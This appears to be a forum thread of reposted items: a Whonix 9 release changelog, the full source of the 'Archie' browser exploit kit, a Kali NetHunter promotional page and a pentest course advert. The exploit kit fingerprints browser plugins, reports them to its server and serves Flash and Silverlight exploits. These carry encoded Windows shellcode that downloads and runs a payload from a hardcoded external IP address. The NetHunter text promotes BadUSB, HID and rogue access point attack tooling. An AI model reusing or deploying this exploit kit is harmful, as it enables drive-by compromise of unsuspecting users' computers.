– Changed keyserver (suggested by tempest @ https://www.whonix.org/forum/index.php/topic,140.0.html) from hkp://2eghzlv2wwcq7u7y.onion to hkp://qdigse2yzvuglcix.onion as used by torbirdy and https://raw.github.com/ioerror/torbirdy/master/gpg.conf.
– Whonix-Gateway: Re-enabled AppArmor for System Tor. Removed workaround for http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=732578 (USE_AA_EXEC=”no”) by removing Whonix’s displaced (config-package-dev) /etc/default/tor, since that bug has been fixed upstream.
– bootclockrandomization: randomizing milliseconds (anonymous, unlink from the host)
– Whonix-Workstation: added password manager fpm2 as per https://www.whonix.org/forum/index.php/topic,187.15.html
– removed –onion feature from update-torbrowser and its man page because torproject took its .onion domain permanently offline (https://trac.torproject.org/projects/tor/ticket/11567); thanks to z (https://www.whonix.org/forum/index.php?action=profile;u=94) for the report (https://www.whonix.org/forum/index.php/topic,277.msg1827.html#msg1827)
– help_check_tor_bootstrap.py:
  – suggestions by Damian Johnson from
    — https://lists.torproject.org/pipermail/tor-dev/2014-May/006799.html
    — https://lists.torproject.org/pipermail/tor-dev/2014-May/006804.html
  – troubadour advised on implementation https://www.whonix.org/forum/index.php/topic,278.0
  – controller.authenticate(“password”) isn’t required, controller.authenticate() works
  – more robust method to parse Tor bootstrap percent
– removed obsolete whonix_gateway/usr/bin/armwrapper (user “user” is now a member of group “debian-tor”, so it is no longer required to start arm as user “debian-tor”)
– removed backgroundd, was replaced by gateway first run notice https://www.whonix.org/forum/index.php?topic=207
– added machine readable copyright files
– better output, better formatting, clickable links, thanks to https://github.com/troubadoour for working on msgcollector
– kde-kgpg-tweaks: added gnupg-agent to dependencies, because we’re using it in the config and because otherwise kgpg would complain about using use-agent while having no agent installed
– Refined whonixlock.png. Thanks to nanohard (https://www.whonix.org/forum/index.php?action=profile;u=248) for the edit!
– added apt-transport-https to anon-shared-packages-dependencies
– added openvpn to anon-shared-packages-recommended
– added network-manager-kde to anon-shared-desktop-kde
– changed displace extension from .apparmor to .anondist, thanks to [config-package-dev] How to configure displace extension?
– control-port-filter: Added “lie feature”, i.e. when getting asked “GETINFO net/listeners/socks”, answer ‘250-net/listeners/socks=”127.0.0.1:9150″‘; configurable by the CONTROL_PORT_FILTER_LIMIT_GETINFO_NET_LISTENERS_SOCKS variable. Enabled by default.
– control-port-filter: Limit maximum accepted command string length to 128 (configurable) as done by Tails (https://mailman.boum.org/pipermail/tails-dev/2014-February/005041.html). Thanks to HulaHoop (https://www.whonix.org/forum/index.php?action=profile;u=87) for suggesting this (https://www.whonix.org/forum/index.php/topic,342.0.html).
– control-port-filter: added GETINFO status/circuit-established to whitelist
– control-port-filter: replaced netcat-traditional dependency with netcat-openbsd as per https://www.whonix.org/forum/index.php/topic,444.0.html
– sdwdate: implemented options –no-move-forward and –no-move-backwards (disabled by default)
– sdwdate: implemented option to update hardware clock –systohc (disabled by default)
– sdwdate: no more clock jumps. Gradually adjust clock as NTP does. Sclockadj has been written by Jason Ayala (Jason@JasonAyala.com) (@JasonJAyalaP) – https://github.com/Whonix/Whonix/issues/169
  – Sclockadj helps sdwdate gradually adjust the clock instead of producing clock jumps, which can confuse Tor, i2p, servers, logs and more.
  – It can add/subtract any amount of nanoseconds.
  – It supports waiting an interval of min/max nanoseconds between iterations, which will be randomized if min/max differ.
  – It supports slewing the time for min/max nanoseconds, which will be randomized if min/max differ.
  – It supports waiting before its first iteration.
  – It can run either verbose or quiet.
  – It supports either really changing the time or running in debug mode.
– sdwdate: use median instead of average as suggested in https://www.whonix.org/forum/index.php/topic,267.0.html
– whonixcheck: don’t just check if Tor is fully bootstrapped, also check if Tor was actually able to create a circuit
– whonixcheck: increased Tor socks port reachability test timeout from 5 to 10 as per https://www.whonix.org/forum/index.php/topic,129.0.html
– whonixcheck: fixed apt-get –simulate parsing code; whonixcheck can now also report how many packages could be upgraded when using non-English languages
– whonixcheck: There is no general “Whonix Debian Version” anymore, because Whonix has been split into multiple packages that now all have their own version number. What whonixcheck can figure out is if the whonixcheck version is up to date and if there is a Whonix news file for that whonixcheck version. There is currently no notification in whonixcheck for packages other than whonixcheck for users who do not use Whonix’s APT repository.
– whonixcheck: check_virtualizer, no longer warn if Qubes (https://www.whonix.org/wiki/Qubes) is detected; improved output, improved html tags
– anon-shared-build-apt-sources-tpo: updated The Tor Project’s apt signing key as per https://trac.torproject.org/projects/tor/ticket/12994#comment:9
– whonixcheck: refactoring, use /usr/lib/msgcollector/striphtml rather than sed in usr/lib/whonixcheck/check_tor_socks_or_trans_port
– added VPN_FIREWALL feature to Whonix-Gateway’s firewall https://www.whonix.org/blog/testers-wanted-vpn-firewall – https://www.whonix.org/wiki/Next#Tunnel_Tor_through_VPN
– Whonix-Firewall: make variables overridable by the /etc/whonix_firewall.d config folder
– Whonix-Firewall: renamed variable NON_TOR_WHONIXG to NON_TOR_GATEWAY
– added empty Whonix-Custom-Workstation
– Added extra log file /var/run/tor/log that won’t survive reboot.
(Existing log file /var/log/tor/log that survives reboot will continue to exist.) And added necessary AppArmor rules. Thanks to @troubadoour who figured out the AppArmor rules (https://www.whonix.org/forum/index.php/topic,372.0/topicseen.html). This is useful, so whonixcheck can in future grep the log for clock specific warnings (https://github.com/Whonix/Whonix/issues/244).
– sdwdate: log time/date before and after running sclockadj
– swap-file-creator: timeout when reading from /dev/random
– when whonixsetup is automatically started, support automatically maximizing window in other terminals than konsole
– disable TCP-Timestamps (implemented #247)
– New alternative option name –install-to-root. This is an alternative to –bare-metal, since some users liked to use “–bare-metal in a VM”, which sounds like an oxymoron. Now we can talk about “using –install-to-root in a VM”.
– Drop all incoming ICMP traffic by default. All incoming connections are dropped by default anyway, but should a user allow incoming ports (such as for incoming SSH or FlashProxy), ICMP should still be dropped to filter, for example, ICMP time stamp requests.
– Removed geoclue-ubuntu-geoip and geoclue from anon-banned-packages because those are not evil by definition, those are only providing an API. Not allowing them to be installed would not allow users to install gnome-desktop-environment.
– vbox-disable-timesync: added compatibility with Debian jessie
– whonix-gw-firewall: Added 10.0.2.2/24 to NON_TOR_GATEWAY and LOCAL_NET to prevent spamming syslog with: host dhclient: DHCPREQUEST on eth0 to 10.0.2.2 port 67 | host dhclient: send_packet: Operation not permitted
– rads: made compatible with systemd / debian testing by adding tty1 autologin drop-in config
– tb-updater: update tbb version url as per https://trac.torproject.org/projects/tor/ticket/8940#comment:21
– tb-updater: compatibility with new recommended tbb versions format as per https://trac.torproject.org/projects/tor/ticket/8940#comment:28
– tb-updater: Whonix’s Tor Browser updater: download from torproject’s clearnet domain instead of torproject’s onion domain by default, because the onion domain is too slow/can’t handle the load. Downloading from the onion domain is possible using –onion.
– tb-updater: break when endless data attack is detected (max file size 100 mb for torbrowser, 1 mb for other files)
– anon-ws-disable-stacked-tor: Set environment variable “export TOR_SKIP_CONTROLPORTTEST=1” to skip TorButton control port verification as per https://trac.torproject.org/projects/tor/ticket/13079. Will take effect as soon as The Tor Project merges the TOR_SKIP_CONTROLPORTTEST patch.
– sdwdate: curl, use –head rather than –include as per https://github.com/Whonix/Whonix/issues/315
– sdwdate: Breaking change: pool variable names were renamed. SDWDATE_POOL_PAL and SDWDATE_POOL_NEUTRAL are now called SDWDATE_POOL_ONE, SDWDATE_POOL_TWO, SDWDATE_POOL_THREE. If you were using custom pools, you should update your config according to the new variable names. As per https://github.com/Whonix/Whonix/issues/310.
– sdwdate: no longer using pal/neutral/foe pool design. Using three pools instead, that only contain servers of the type “pal”. As per https://github.com/Whonix/Whonix/issues/310. Thanks to https://github.com/HulaHoopWhonix for suggesting it.
– uwt: all temporary files are now in /tmp/uwt
– anon-base-files /usr/lib/pre.bsh: all temporary files are now in /tmp/prepost
– whonixcheck / sdwdate / timesync / tb-updater / whonix-repository / control-port-filter: fix, clean up temporary files/directory
– whonixcheck / timesync / update-torbrowser: correct exit codes on signal sigterm and sigint
– whonixcheck / timesync: output
– whonix-gw-kde-desktop-conf: no longer use custom wallpaper (mountain mist) for Whonix-Gateway. Only use wallpapers from Debian repository for security reasons. (https://github.com/Whonix/Whonix/issues/318) Will now default to KDE’s default wallpaper. (Thanks to https://github.com/HulaHoopWhonix for suggesting it)
– build script: Added deletion of /boot/grub/device.map for VM builds during build process to prevent hard drive serial of build machine leaking into image. System also boots without /boot/grub/device.map. https://github.com/Whonix/Whonix/issues/249
– build script: verifiable builds: now using fixed disk identifiers to make verification easier
– build script: updated frozen repository
– build script: improved error handling; when an error is detected, wait until the builder presses enter before cleanup and exit, to make it simpler to read error messages when building in cli
– build script: whonix_build now acts differently for –clean option depending on –virtualbox, –qcow2 and –bare-metal
– build script: removed Whonix’s grml-debootstrap fork, because Whonix’s patches were merged upstream
– build script: Renamed “img” to “raw”, because “img” was a poor name for raw images.
– build script: made variables overrideable by build config
– build script: set DEBUILD_LINTIAN_OPTS to “–info –display-info –show-overrides –fail-on-warnings”, to show more verbose lintian output and to break the build should lintian find an error such as a syntax error in a bash script
– build script: Workaround for a bug in kpartx, which fails to delete the loop device when using very long file names, as per https://www.redhat.com/archives/dm-devel/2014-July/msg00053.html
– build script: implemented –testing-frozen-sources, installs from Debian testing frozen (snapshot.debian.org) sources. This is useful for compatibility testing of Whonix’s Debian packages with Debian testing. There is no official support for Debian testing.
– build script: Use SAS rather than SATA as virtual hard disk controller for VirtualBox hdds to work around a VirtualBox upstream bug that causes filesystem corruption on high disk I/O (https://www.virtualbox.org/ticket/10031). Thanks to @neurodrive for the bug report (https://github.com/Whonix/Whonix/issues/274).
– whonix-repository tool, anon-shared-build-apt-sources-tpo, anon-apt-sources-list: use wheezy rather than stable as per https://www.whonix.org/forum/index.php/topic,445.msg3640.html
– build script: makefile: added new feature “make deb-chl-bumpup” – Bump upstream version number in debian/changelog.
– build script: added support for –vram, –vmram, –vmsize switches
– build script: added –file-system (var: whonix_build_file_system)
– build script: added –hostname (var: whonix_build_hostname)
– build script: added –os-password (var: whonix_build_os_password)
– build script: added –debopt (var: whonix_build_debopt)

Sursa: https://www.whonix.org/blog/whonix-anonymous-9-released
-
*** @PhysicalDrive0 ***

<html>
<head>
<script type="text/javascript" src="pluginDet.js"></script>
<style type="text/css">
    html, body { height: 100%; overflow: auto; }
    body { padding: 0; margin: 0; }
    #form1 { height: 99%; }
    #silverlightControlHost { text-align:center; }
</style>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
</head>
<body>
</body>
<script>
var payload = "FCE8A20000006089E531D2648B52308B520C8B52148B7228528B52108B423C8B44027885C0744801D0508B48188B582001D3E33A498B348B01D631FF31C0AC84C07407C1CF0D01C7EBF43B7D2475E3588B582401D3668B0C4B8B581C01D38B048B01D0894424205A61595A51FFE0585A8B12EBA16A40680010000068000400006A006854CAAF91FFD5C389C8C1E902F2A588C180E103F2A4C331C0505051535068361A2F70FFD5C35D686F6E00006875726C6D54688E4E0EECFFD5E8B4FFFFFF505068040100006833CA8A5BFFD5508B74240401C6B065880646B02E880646B064880646B06C880646B06C880646B0008806EB228B4C24088B1C2451E898FFFFFF688E4E0EECFFD568983A000068B0492DDBFFD5EB21E8D9FFFFFF687474703A2F2F3134342E37362E33362E36373A383038332F6464005858585858C3";
var payload2 = "0x0018A164,0xC0830000,0x81208b08,0xFFF830C4,0xA2E8FCFF,0x60000000,0xD231E589,0x30528B64,0x8B0C528B,0x728B1452,0x528B5228,0x3C428B10,0x7802448B,0x4874C085,0x8B50D001,0x588B1848,0xE3D30120,0x348B493A,0x31D6018B,0xACC031FF,0x0774C084,0x010DCFC1,0x3BF4EBC7,0xE375247D,0x24588B58,0x8B66D301,0x588B4B0C,0x8BD3011C,0xD0018B04,0x20244489,0x5A59615A,0x58E0FF51,0xEB128B5A,0x68406AA1,0x00001000,0x00040068,0x68006A00,0x91AFCA54,0x89C3D5FF,0x02E9C1C8,0xC188A5F2,0xF203E180,0xC031C3A4,0x53515050,0x1A366850,0xD5FF702F,0x6F685DC3,0x6800006E,0x6D6C7275,0x4E8E6854,0xD5FFEC0E,0xFFFFB4E8,0x685050FF,0x00000104,0x8ACA3368,0x50D5FF5B,0x0424748B,0x65B0C601,0xB0460688,0x4606882E,0x068864B0,0x886CB046,0x6CB04606,0xB0460688,0xEB068800,0x244C8B22,0x241C8B08,0xFF98E851,0x8E68FFFF,0xFFEC0E4E,0x3A9868D5,0xB0680000,0xFFDB2D49,0xE821EBD5,0xFFFFFFD9,0x70747468,0x312F2F3A,0x372E3434,0x36332E36,0x3A37362E,0x33383038,0x0064642F,0x58585858,0x9090C358";

var payload3 = "/OiiAAAAYInlMdJki1Iwi1IMi1IUi3IoUotSEItCPItEAniFwHRIAdBQi0gYi1ggAdPjOkmLNIsB1jH/McCshMB0B8HPDQHH6/Q7fSR141iLWCQB02aLDEuLWBwB04sEiwHQiUQkIFphWVpR/+BYWosS66FqQGgAEAAAaAAEAABqAGhUyq+R/9XDicjB6QLypYjBgOED8qTDMcBQUFFTUGg2Gi9w/9XDXWhvbgAAaHVybG1UaI5ODuz/1ei0////UFBoBAEAAGgzyopb/9VQi3QkBAHGsGWIBkawLogGRrBkiAZGsGyIBkawbIgGRrAAiAbrIotMJAiLHCRR6Jj///9ojk4O7P/VaJg6AABosEkt2//V6yHo2f///2h0dHA6Ly8xNDQuNzYuMzYuNjc6ODA4My9kZABYWFhYWMOQkJA=";

function spanAppend(val)
{
    var a = document.createElement("span");
    document.body.appendChild(a);
    a.innerHTML = val;
}

function flashLow()
{
    spanAppend('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /><param name="movie" value="flashlow.swf" /><param name="allowScriptAccess" value="always" /><param name="FlashVars" value="id='+payload+'" /><param name="Play" value="true" /></object>');
}

function flashHigh()
{
    spanAppend('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="1" height="1" id="23kjsdf"><param name="movie" value="flashhigh.swf" /><param name="FlashVars" value="sh='+payload2+'" /></object>');
}

function silverHigh()
{
    spanAppend('<form id="form1" runat="server" ><div id="silverlightControlHost"><object data="data:application/x-silverlight-2," type="application/x-silverlight-2" width="100%" height="100%"><param name="source" value="silverapp1.xap"/><param name="background" value="white" /><param name="InitParams" value="payload='+payload3+'" /></object></div></form>');
}

function fV(val)
{
    return PluginDetect.isMinVersion("Flash", val);
}

function sV(val)
{
    return PluginDetect.isMinVersion("Silverlight", val);
}

function ie(turl)
{
    w = "frameBorder";
    r = "width";
    q = "iframe";
    s = "height";
    z = "createElement";
    c = "src";
    g = '10';
    hh = turl;
    ha = document.createElement(q);
    ha[w] = '0';
    ha[r] = g;
    ha[s] = g;
    b = ha[c] = hh;
    document.body.appendChild(ha);
    return;
}

function ieVerOk()
{
    t = "test";
    try {
        j = window.navigator.userAgent.toLowerCase();
        x = /MSIE[\/\s]\d+/i [t](j);
        m = /Win64;/i [t](j);
        z = /Trident\/(\d)/i [t](j) ? parseInt(RegExp.$1) : null;
        if (!m && x && z && (z == 6 || z == 5 || z == 4)) {
            return true
        }
    } catch (exc) {}
    return false
}

function ieVer() {
    t = "test";
    try {
        if (window.msCrypto)
            return 11;
        if (window.atob)
            return 10;
        if (document.addEventListener)
            return 9;
        if (window.JSON && document.querySelector)
            return 8;
        if (window.XMLHttpRequest)
            return 7;
    } catch (exc) { }
    return 0
}

function arch() {
    try
    {
        var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
        xmlDoc.async = false;
        xmlDoc.loadXML('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "res://c:\\Program Files (x86)\\Internet Explorer\\iexplore.exe">');
        if (xmlDoc.parseError.errorCode == -2147023083)
        {
            return 64;
        }
    }
    catch (ex)
    {
        return 0;
    }
    return 32;
}

var flashVer = PluginDetect.getVersion("Flash");
var Branch = 0;
if (flashVer == "11,0,1,152"
    || flashVer == "11,1,102,55" || flashVer == "11,1,102,62"
    || flashVer == "11,1,102,63" || flashVer == "11,2,202,228"
    || flashVer == "11,2,202,233" || flashVer == "11,2,202,235")
    Branch = 1;

if (fV("11,3,300,257") == 1 && (fV("11,7,700,276") == -0.1))
    Branch = 2;
if (fV("11,8,800,94") == 1 && (fV("13,0,0,183") == -0.1))
    Branch = 2;

var silverVer = PluginDetect.getVersion("Silverlight");
var silverBranch = 0;
if (sV("4,0,50401,0") == 1 && sV("5,1,10412,0") == -0.1)
    silverBranch = 1;

var adoberVer = PluginDetect.getVersion("AdobeReader");
var adoberBranch = 0;

var archSys = arch();
var ieVersion = 0;
if (archSys != 0)
    ieVersion = ieVer();

var sendstr = "";
sendstr += encodeURI("dump=" + flashVer + "|" + silverVer + "|" + adoberVer + "|" + archSys + "|" + ieVersion + "|" + Branch);
sendstr += encodeURI("&ua=" + window.navigator.userAgent);
sendstr += encodeURI("&ref=" + document.referrer);

if (Branch == 0 && silverBranch == 1)
    Branch = 3;
if (Branch == 0 && archSys != 0)
    Branch = 4;

try
{
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.open("POST", "/foo", false);
    xmlhttp.send(sendstr);
}
catch (exc){}

switch (Branch)
{
    //2014-0497
    case 1:
        flashLow();
        break;

    //2014-0515
    case 2:
        flashHigh();
        break;

    case 3:
        silverHigh();
        break;

    case 0:
    case 4:
        //var avar = archSys == 32 ? 0 : 1;
        //ie("/phazar.html?a="+avar);

        ie("/iebasic.html");
        break;
}
</script>
</html>

Sursa: Archie Exploit Kit - Pastebin.com
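As an aside, the payload2 blob appears to be essentially the same shellcode as payload, prefixed with a short prologue and repacked as comma-separated little-endian dwords with NOP padding, the format the flashhigh.swf exploit receives via FlashVars. A sketch of that repacking (the function name is mine; the prologue handling is omitted):

```python
def pack_dwords(hex_shellcode):
    """Repack a hex shellcode string into the comma-separated little-endian
    dword format observed in payload2 above (NOP-padded to a dword boundary)."""
    data = bytes.fromhex(hex_shellcode)
    data += b"\x90" * (-len(data) % 4)          # 0x90 NOP padding, as in payload2's tail
    return ",".join(
        "0x%08X" % int.from_bytes(data[i:i + 4], "little")
        for i in range(0, len(data), 4)
    )

# First 8 bytes of payload: FC E8 A2 00 | 00 00 60 89
demo = pack_dwords("FCE8A20000006089")
print(demo)  # -> 0x00A2E8FC,0x89600000
```

This matches, for instance, payload2's final dword 0x9090C358, which is the bytes 58 C3 (the shellcode's trailing pop/ret) followed by two NOP pad bytes.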
-
Kali Linux Nexus NetHunter

The Kali Linux NetHunter project is the first open-source Android penetration testing platform for Nexus devices, created as a joint effort between the Kali community member “BinkyBear” and Offensive Security. NetHunter supports wireless 802.11 frame injection, one-click MANA Evil Access Point setups, HID keyboard (Teensy-like) attacks, as well as BadUSB MITM attacks – and is built upon the sturdy shoulders of the Kali Linux distribution and toolsets.

Whether you have a Nexus 5, Nexus 7, or Nexus 10, we’ve got you covered. Our freely downloadable images come with easy-to-follow installation and setup instructions to get you up and running in no time at all.

- 802.11 wireless injection and AP mode support with multiple supported USB wifi cards.
- Capable of running USB HID keyboard attacks, much like the Teensy device is able to do.
- Supports BadUSB MITM attacks. Plug your NetHunter into a victim PC, and have your traffic relayed through it.
- Contains a full Kali Linux toolset, with many tools available via a simple menu system.
- USB Y-cable support in the NetHunter kernel – use your OTG cable while still charging your Nexus device!
- Software-defined radio support. Use Kali NetHunter with your HackRF to explore the wireless radio space.
- Configure and build your NetHunter image from scratch. It’s completely open source.

“The Advanced HID keyboard is like a Teensy device, but you can SSH to it over 3G.”
“The BadUSB attack is jaw-dropping. Connect NetHunter to a USB port and become the default gateway.”

Open Source, Based on Kali Linux

As an experienced penetration tester or security professional, it is imperative that you trust the tools you work with. One way to achieve this trust is by having full transparency and familiarity with the code you are running. You are free to read, investigate, and change our build scripts for the NetHunter images. All of this goodness from the house of Offensive Security and developers of Kali Linux!
HID Keyboard and ‘BadUSB’ Attacks

Our NetHunter images support programmable HID keyboard attacks (a la Teensy), as well as “BadUSB” network attacks, allowing an attacker to easily MITM an unsuspecting target by simply connecting their device to a computer USB port. In addition to these built-in features, we’ve got a whole set of native Kali Linux tools available for use, many of which are configurable through a simple web interface.

Configuration Management

The Kali NetHunter configuration interface allows you to easily configure complex configuration files through a local web interface. This feature, together with a custom kernel that supports 802.11 wireless injection and preconfigured connect-back VPN services, makes NetHunter a formidable network security tool or discreet drop box – with Kali Linux at the tip of your fingers wherever you are!

Downloads | Setup Guide

“Running the Evil AP “Mana” toolkit by Sensepost is as simple as clicking a single button.”
“Although running on Android, I love how you can just VNC into Kali, and use all the tools you are used to.”
“I switched on my NetHunter and was immediately surrounded by beautiful women, it was amazing.”

Sursa: http://www.kali.org/kali-linux-nethunter/
-
Draft law on Romania's cybersecurity
Nytro replied to Nytro's topic in Stiri securitate
My take: another black hole for public money.
Draft law on Romania's cybersecurity

Senate registration number: L580/2014
Quick-access link to the legislative document: Senatul României - Fișă senator
Reference: plx263/2014
First chamber: Chamber of Deputies
Type of initiative: draft law
Initiators: Government of Romania
Number of articles: 33
Legislative Council opinion: 513/05.05.2014
Urgency procedure: no
Status: in progress, before the Senate's standing committees
Character of the law: organic
Opinions of interested parties on legislative proposals under public consultation: opinions submitted

Legislative procedure:

16-09-2014: adopted by the Chamber of Deputies
19-09-2014: registered at the Senate for debate under no. b513 (reference no. plx263/16/09/2014)
22-09-2014: under no. L580, presented in the Standing Bureau; the Senate is the decision-making chamber
22-09-2014: sent for report to the Committee for Defense, Public Order and National Security (DEADLINE: 24/09/2014)

Related documents: the letter forwarding the legislative initiative for debate; the initiator's form; the explanatory memorandum on the legislative initiative; the Legislative Council's opinion; the Government decision; the letter transmitting the initiative to the other chamber for debate; the form adopted by the Chamber of Deputies.

As adopted by the Chamber of Deputies: http://www.senat.ro/legis/PDF%5C2014%5C14L580FC.pdf

Sursa: Senatul României - Fișă senator
-
And who is going to implement something like this?
-
https://www.techdirt.com/articles/20130723/12395923907/even-powering-down-cell-phone-cant-keep-nsa-tracking-its-location.shtml FBI taps cell phone mic as eavesdropping tool - CNET News
-
The main focus of this course is to teach you the following skills:

- Gather Information Intelligence
- Find Web Application and System Security Vulnerabilities
- Scan Your Target Stealthily
- Exploit Web Applications and System Vulnerabilities
- Conduct Real World Client Side Attacks
- Conduct Tactical Post Exploitation on Windows and Linux Systems
- Develop Windows Exploits

The Course

The course covers 8 modules:

- Module 1: Solid Introduction to Penetration Testing
- Module 2: Real World Information Intelligence Techniques
- Module 3: Scanning and Vulnerability Assessment
- Module 4: Network Attacking Techniques
- Module 5: Windows – Unix Attacking Techniques
- Module 6: Windows – Unix Post-exploitation Techniques
- Module 7: Web Exploitation Techniques
- Module 8: Windows Exploit Development

Found it here: CODENAME: Samurai Skills - Real World Penetration Testing Training - Darknet - The Darkside

Looks interesting.
-
For those interested: OpenBTS | Open Source Cellular Infrastructure